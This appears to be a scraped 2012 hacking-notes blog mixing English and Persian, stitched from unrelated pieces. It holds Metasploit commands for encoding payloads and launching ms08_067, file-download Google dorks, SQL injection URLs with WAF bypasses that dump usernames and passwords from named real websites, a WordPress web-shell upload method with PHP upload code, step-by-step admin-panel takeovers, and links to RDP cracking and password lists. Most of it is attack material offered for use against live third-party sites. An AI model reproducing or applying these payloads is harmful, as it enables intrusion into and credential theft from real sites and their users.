  342. msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
  343. Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.

  344. Select All
  345. Code:
  346. msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
  347. Create a multi-encoded payload.

  348. Select All
  349. Code:
  350. msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
  351. Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.

  352. MSFcli Commands:

  353. Select All
  354. Code:
  355. msfcli | grep exploit
  356. Show only exploits.

  357. Select All
  358. Code:
  359. msfcli | grep exploit/windows
  360. Show only Windows exploits.

  361. Select All
  362. Code:
  363. msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
  364. Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on port 443.
 
BUG LFD DORK

inurl:"download.php?file="inurl:"download.php?src="inurl:"download.php?url="inurl:"download.php?f="inurl:"download.php?book_file="inurl:"download.php?di_key="inurl:"download.php?path="inurl:"download.php?dfile="inurl:"download.php?get="inurl:"download.php?u="inurl:"dl.php?file="inurl:"down.php?dd="inurl:"down.php?name="inurl:"down.php?downfile"inurl:"down.php?arq="inurl:"file.php?src="inurl:"download.php?downloadFile"inurl:"download.php?page="

Wednesday, July 11, 2012

[+] Exploit Title : Word Press image-gallery plugin Sql Injection

[+] Google Dork   : inurl:image-gallery/?gallery_id=

[+] Autor        : Mr.XpR

[+] Download : http://wordpress.org

[+] Contact : No0PM@yahoo.com

[+] Researcher Team : IRaNHaCK Security Team

[+] Bug Level    : High (Sql)

[+] Test        : 7 , Linux Back Track

##################################################################


[+]Exploit

   [-] http://Site.Com/[Patch]image-gallery/?gallery_id=[Sqli]

[+]Inject

   [-] http://www.ucanews.com/image-gallery/?gallery_id=999+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5 ​,6+from+uca_users

[+]Login

   [-] http://www.ucanews.com/wp-login.php

[+]Example :

   [-] http://www.ucanews.com/image-gallery/?gallery_id=999+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5 ​,6+from+uca_users
   [-] More In Google ...
Cpanel 11.X Multiple CSRF Vulnerability
====================================================================

save these codes as a .htm or .html page and then run in ur browser

note 1 :

write ur target's ip instead of
IP " in ur html page"
__________________


####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################

===[ Exploit ]===


Add File
========











  Ur File Name



Rename File
===========
















  New Name



Edit File
=========
















Delete File
============
















  File Name Delete



Add Folder
===========











  Ur Folder Name



Rename Folder
=============

















  New Name



Delete Folder
=============















  Folder Name Delete
####################################################################


# 1337day.com [2012-05-26] 
آپلود شل در ورد پرس

http://ashiyane.org/forums/showthread.php?threadid=74501
دوست عزیز 2 روش معمول داریم :

1- برو تو قسمت ادیت قالب بعد از اونجا index.phpیا همونmain.phpرو انتخاب کن از سمت راست بهد کد اون صفحه رو کات کن در یک نوت پد بعد کد یک شلر رو بریز جاش و ذخیره کن بعد برو سایت باز کن میبینی شلت ران شد

2- میتونی یک افزونه وردپرس دانلود کنی بعد یک شل در فایل فشرده افزونه جا بدی بعد از قسمت افزودن افزونه افزونه رو نصب کنی خوب العان شل کجاست اینجا :


site.com/wp-content/plugins/اسم افزونه شما/shell.php 
دوست عزیز شما برو قسمت editor و توی یکی از فایل های php کد زیر رو اضافه کن بعد پیج رو بالا بیار
کد PHP:
if(isset($_POST['Submit'])){
    
$filedir "";
    
$maxfile '2000000';

    
$userfile_name $_FILES['image']['name'];
    
$userfile_tmp $_FILES['image']['tmp_name'];
    if (isset(
$_FILES['image']['name'])) {
        
$abod $filedir.$userfile_name;
        @
move_uploaded_file($userfile_tmp$abod);
 
echo
"
Done = $userfile_name
"
;
}
}
else{
echo
'
'
;
}
?>

اول این دورکش :

intitle:"News list Administration panel"
or
"Simple PHP Newsletter"
or
"WESPA PHP Newsletter v3.0"

خوب حالا وقتی سایت مورد نظر را پیدا کردید به اینجا میرید :
target.com/newsletter/admin.php
or
target.com/mailer/admin.php

حالا admin.php رو پاک کرده و اینو جاش بنویسید :
/install/install1.php

خوب الان شما میتونید رمز رو عوض کنید .
فقط وقتی سوال کرد از my sql میخواهید استفاده کنید؟ شما no بزنید .


http://packetstormsecurity.org/files/99841/simplephpnewsletter-admin.txt
exploit by viper hacker

to system hasta daram va kheily ok hast

سلام امروز میخوام یه باگ جدید بهتون معرفی کنم که باهاش در کمتر از 2 دقیقه سایتهایی را که این باگ را دارا هستند هک کنید

1.برای یافتن victim در گوگل جمله ی مقابل را سرچ کنید : Powered by eLitius version 1.0

2.سپس یک سایت را به عنوان victim انتخاب کنید (دقت کنید که با سایت هایی که در باره ی این جمله توضیح داده اند اشتباه نشود)

3.لینک سایت را کپی کرده و به جای Your Victim که در اکسپولیتی که برایتان پیوست کردم قرار دهید
و فقط سایت را با پسوند کپی کنید بدون www و //:http مثلا : victim.com

اکسپولیت : expolit by Viper Hacker

4.اکسپولیت را با پسوند html ذخیره کنید

5.اکسپولیتی را که با پسوند html ذخیره کردید را باز کنید و روی save کلیک کنید

6.اگر یک صفحه ی لوگین باز شد که با وارد کردن کلمه ی admin در کادر های username و password میتوانید مدیریت سایت را بر عهده بگیرید و اگر ارور داد باید در اکسپولیت بعد از کلمه ی affiliate یک s قرار دهید

این هم یک mr-pctech.com :victim که برای این victim باید بعد از affiliate حرف s را قرار دهید(در اکسپولیت)

اگر در این مورد سوال داشتید به ایمیلم پیام بدید

ali.viper76@yahoo.com
BY PASS HAYE SQL INJECTION


answer=-999/**/union/**/select all 1,2,table_name,4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables --

union all select 1,table_name,3 from information_schema.tables/*  


/union /*!select*/ 1,concat_ws(0x7c,table_name),3,4,5,6 from information_schema./*!tables*/ where table_schema=database()-- -   


http://www.digitalflywheel.com/case.php?id=-4+union%20select%201,2,3,4,5,6,7,8,concat_ws%280x3a,username,0x3a,password%29+from+users+limit+1,1

http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,13,14,15,16,17,18+from+information_schema.columns--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,concat%28table_name,0x3a3a,column_name%29,13,14,15,16,17,18+from+information_schema.columns--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables-- http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=CHAR%28108,%20111,%20103,%20105,%20110%29

http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR%28117,%20115,%20101,%20114%29
http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR%28117,%20115,%20101,%20114%29+limit+2,5--


http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1+offset+100-- 


answer=-999/**/union/**/select all 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables -- 


jaye union %75%6E%69%6F%6E 
    


/*!UniON*/**/SeLeCT+1,2,3,4,5,6,7,8,9,10,11,12,13--

uni*on+sel*ect+1,2,3,4,5,6,7,8,9,10,11,12,13--

UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,4,5,6,7,8,9,10,11,12,13--

/*!UniON*/+aLl+/*!sELECt*/+1,2,3,4,5,6,7,8,9,10,11,12,13


http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28table_name%29,6,7,8,9+from%20information_schema.tables+where+table_schema=0x6861736861726174--
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28column_name%29,6,7,8,9+from%20information_schema.columns+where+table_name=0x7573657273--
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28id,0x3a,nick,0x3a,password,0x3a,email%29,6,7,8,9+from+users-- 

Sunday, July 8, 2012

http://www.guilanfx.com

http://forexschool.iranbourseonline.com/

crack RDP

http://ajaxtm.com/forum/showthread.php?p=7394#post7394


BT

http://ajaxtm.com/forum/showthread.php?p=7383#post7383
netstat  ipconfig route va.......

http://ashiyane.org/forums/showthread.php?p=382225#post382225


CRACKER PASS LIST

http://ashiyane.org/forums/showthread.php?t=72306
host raygan


zio.ir
youhosting.ir
ooq.ir

ز اینجا به بعد در مورد کنترل پنل DirectAdmin میگم.
امیدوارم مفید واقع شده باشه.

_______________________________
از دیگر کنترل پتل های تحت وب میتوان به DirectAdmin اشاره کرد.
ویژگی ها و امکانات این کنترل در سه عبارت استفاده آسان ، سرعت بالا ، و پشتیبانی قوی خلاصه میشود.
کنترل پنل فوق تحت سیستم عامل وب سرور لینوکس نصب و پیکر بندی میشود.
حداقل پیش نیار سخت افزاری برای نصب آن:
پردازشگر : 500 مگاهرتز
RAM : 128 مگابایت
و 2 گیگابایت فضای خالی هارد دیسک میباشد.

در این کنترل پنل از Apache ، PHP ، MySQL ، PhpMyAdmin و سیستم مدیریت پست الکترونیکی Exim پشتیبانی کامل میشود.

سایت سازنده و نسخه نمایشی آن از طریق سایت www.DirectAdmin.com در دسترس میباشد.
همچنین جهت دسترسی به این کنترل پنل می بایست نام کاربری (user) و کلمه عبور (pass) مربوطه را پس از عبارت ":2082" در انتهای آدرس سایت خود را وارد کنید،
همانند : www.ashiyane.org:2082